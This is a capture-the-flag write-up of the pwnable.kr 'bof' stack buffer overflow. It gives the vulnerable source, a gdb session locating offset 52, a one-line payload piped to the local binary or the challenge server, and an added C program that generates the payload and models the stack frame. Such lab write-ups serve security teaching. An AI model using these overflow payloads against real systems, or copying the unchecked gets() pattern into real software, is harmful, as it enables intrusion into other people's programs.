Challenge link: http://pwnable.kr/play.php

After downloading the source code and binary from the link, the source looks like this:
```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
    char overflowme[32];
    printf("overflow me : ");
    gets(overflowme);
    if(key == 0xcafebabe){
        system("/bin/sh");
    }
    else{
        printf("Nah..\n");
    }
}
int main(int argc, char* argv[]){
    func(0xdeadbeef);
    return 0;
}
```
This is a buffer-overflow challenge. The bug is that gets() never checks the length of the input, so anything longer than the 32-byte overflowme buffer spills over into the rest of the stack frame. Let's look at it in gdb (with PEDA loaded):
```
root@kali-linux:~/文档/PWN/pwnable.kr/3.bof# gdb ./bof
warning: build/bdist.linux-x86_64/wheel/peda/peda.py: No such file or directory
Reading symbols from ./bof...(no debugging symbols found)...done.
gdb-peda$ pattern_creat 150
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA'
gdb-peda$ r
Starting program: /root/文档/PWN/pwnable.kr/3.bof/bof
overflow me : AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA
Nah..
*** stack smashing detected ***: /root/文档/PWN/pwnable.kr/3.bof/bof terminated

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x31414162 ('bAA1')
EBX: 0xf7fcf000 --> 0x1bef0
ECX: 0xffffd210 ("AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA")
EDX: 0xf7ffd4fc --> 0x0
ESI: 0xffffc9e0 --> 0x0
EDI: 0xffffc9e0 --> 0x0
EBP: 0xffffcab8 --> 0xffffcb18 --> 0xf7fa4000 --> 0x1b2db0
ESP: 0xffffc910 --> 0x40000000 ('')
EIP: 0xf7fc6886 (cmp WORD PTR [eax],0xb858)
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0xf7fc687e:  xchg   ax,ax
   0xf7fc6880:  mov    ecx,DWORD PTR [eax+0x48]
   0xf7fc6883:  mov    eax,DWORD PTR [eax+0x4c]
=> 0xf7fc6886:  cmp    WORD PTR [eax],0xb858
   0xf7fc688b:  je     0xf7fc6b28
   0xf7fc6891:  cmp    BYTE PTR [eax],0xb8
   0xf7fc6894:  jne    0xf7fc68b0
   0xf7fc6896:  cmp    DWORD PTR [eax+0x1],0xad
[------------------------------------stack-------------------------------------]
0000| 0xffffc910 --> 0x40000000 ('')
0004| 0xffffc914 --> 0x0
0008| 0xffffc918 --> 0xffffc960 --> 0x0
0012| 0xffffc91c --> 0xf7fcf000 --> 0x1bef0
0016| 0xffffc920 --> 0x0
0020| 0xffffc924 --> 0x0
0024| 0xffffc928 --> 0x0
0028| 0xffffc92c --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0xf7fc6886 in ?? () from /lib/i386-linux-gnu/libgcc_s.so.1
gdb-peda$ pattern_offset AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgA
AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgA found at offset: 52
```
Feeding the string left in ECX to pattern_offset shows it begins 52 bytes into the pattern, so the offset we need is 52. Two things worth noting about this crash: the SIGSEGV inside libgcc_s.so.1 is not the overflow itself ("Nah.." was already printed; the fault comes from glibc's stack-smashing handler trying to walk a backtrace over the corrupted stack), and a more direct way to confirm the offset is to disassemble func: key is func's first argument and sits at ebp+8 on 32-bit x86, so an offset of 52 means overflowme starts 44 bytes below ebp. In the code:
```c
if(key == 0xcafebabe){
    system("/bin/sh");
}
```
We need to overwrite the stack slot holding key with 0xcafebabe. The `file` command shows the binary is a 32-bit LSB (little-endian) ELF, so the value is written byte-reversed: the payload is "A"*52 + "\xbe\xba\xfe\xca". (`file` also reports it as a "shared object", i.e. a PIE, but that does not matter here: the exploit overwrites a value, not an address, so ASLR never gets in the way.)
```
root@kali-linux:~/文档/PWN/pwnable.kr/3.bof# file bof
bof: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=ed643dfe8d026b7238d3033b0d0bcc499504f273, not stripped
```
PoC:

```sh
(perl -e 'print "A"x52 . "\xbe\xba\xfe\xca\n"'; cat -) | ./bof
```

The trailing "\n" terminates gets(); `cat -` keeps stdin open afterwards so the shell spawned by system() can read our commands instead of hitting EOF and exiting immediately. Against the challenge server, use `nc pwnable.kr 9000` in place of `./bof`.
That drops us into /bin/sh, where `cat flag` gives:

```
daddy, I just pwned a buFFer :)
```

Note that the stack canary does not stop this: the check runs only when func returns, after the if/else, so system("/bin/sh") executes first. Once the shell exits, the `*** stack smashing detected ***` abort fires, but by then the flag has already been read.
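As an added example (not code from the original write-up), the following C program builds the same 52+4 byte payload and replays it against a model of func()'s stack frame, to show why offset 52 lands on `key` and why the canary does not prevent the shell from spawning. The frame layout in `frame_t` is an assumption: it is one layout consistent with pattern_offset's result of 52 on i386 (a 32-byte buffer 44 bytes below ebp, canary plus 8 bytes of padding, saved ebp, return address, then key at ebp+8); `unchecked_gets` is a stand-in for gets(), and the canary/key values it is run against are constructed here.

```c
/* Added example, not part of the original write-up. Builds the payload
 * "A"*52 + LE(0xcafebabe) and replays it against an assumed model of
 * func()'s i386 stack frame (layout below is an assumption consistent
 * with pattern_offset == 52, not taken from the binary's disassembly). */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE   32           /* char overflowme[32] */
#define KEY_OFFSET 52           /* from pattern_offset above */
#define TARGET     0xcafebabeu  /* the value func() compares key against */

/* On 32-bit cdecl the first argument sits at ebp+8, so a buffer that starts
 * buf_below_ebp bytes under ebp is buf_below_ebp + 8 bytes away from it. */
static size_t offset_to_first_arg(size_t buf_below_ebp) {
    return buf_below_ebp + 8;
}

/* Pack a 32-bit value little-endian (the binary is ELF32 LSB per `file`). */
static void le32(uint32_t v, uint8_t out[4]) {
    for (int i = 0; i < 4; i++) out[i] = (uint8_t)(v >> (8 * i));
}

/* padding + LE value; returns bytes written, or 0 if `cap` is too small. */
static size_t build_payload(size_t offset, uint32_t value, uint8_t *out, size_t cap) {
    if (cap < offset + 4) return 0;
    memset(out, 'A', offset);
    le32(value, out + offset);
    return offset + 4;
}

/* Assumed model of func()'s frame, lowest address first. */
typedef struct {
    char     overflowme[BUF_SIZE]; /* ebp-44 .. ebp-13 */
    uint32_t canary;               /* ebp-12 */
    uint32_t pad[2];               /* ebp-8, ebp-4 */
    uint32_t saved_ebp;            /* ebp */
    uint32_t ret_addr;             /* ebp+4 */
    uint32_t key;                  /* ebp+8: first argument of func() */
} frame_t;

/* Stand-in for gets(): copies everything it is given starting at the buffer.
 * The copy is clipped only to the model frame so the simulation cannot
 * corrupt its own host; the real gets() has no limit at all. */
static void unchecked_gets(frame_t *f, const uint8_t *in, size_t len) {
    size_t n = len < sizeof *f ? len : sizeof *f;
    memcpy((uint8_t *)f, in, n);
}

/* 1 if the overwritten key would take the system("/bin/sh") branch. */
static int key_matches(const frame_t *f) { return f->key == TARGET; }

/* 1 if the canary was clobbered. In the real binary this is only detected
 * when func() returns, i.e. after system() has already run. */
static int canary_clobbered(const frame_t *f, uint32_t original) {
    return f->canary != original;
}

int main(void) {
    uint8_t payload[64];
    size_t off = offset_to_first_arg(44);          /* 44 + 8 == KEY_OFFSET */
    size_t n = build_payload(off, TARGET, payload, sizeof payload);

    /* Replay against the model frame; canary and key values are constructed. */
    frame_t f;
    memset(&f, 0, sizeof f);
    f.canary = 0x11223300u;
    f.key    = 0xdeadbeefu;                        /* main() calls func(0xdeadbeef) */
    unchecked_gets(&f, payload, n);
    fprintf(stderr, "key=0x%08x (%s), canary %s\n", f.key,
            key_matches(&f) ? "shell" : "Nah..",
            canary_clobbered(&f, 0x11223300u) ? "clobbered" : "intact");

    /* Emit the raw payload so it can be piped: (./gen; cat) | ./bof */
    fwrite(payload, 1, n, stdout);
    fputc('\n', stdout);                           /* newline terminates gets() */
    return 0;
}
```

The model makes the ordering explicit: the 56-byte write passes through the canary slot on its way to key, so the canary is always clobbered, but that is only checked in func's epilogue, after the `key == 0xcafebabe` comparison has already handed us a shell.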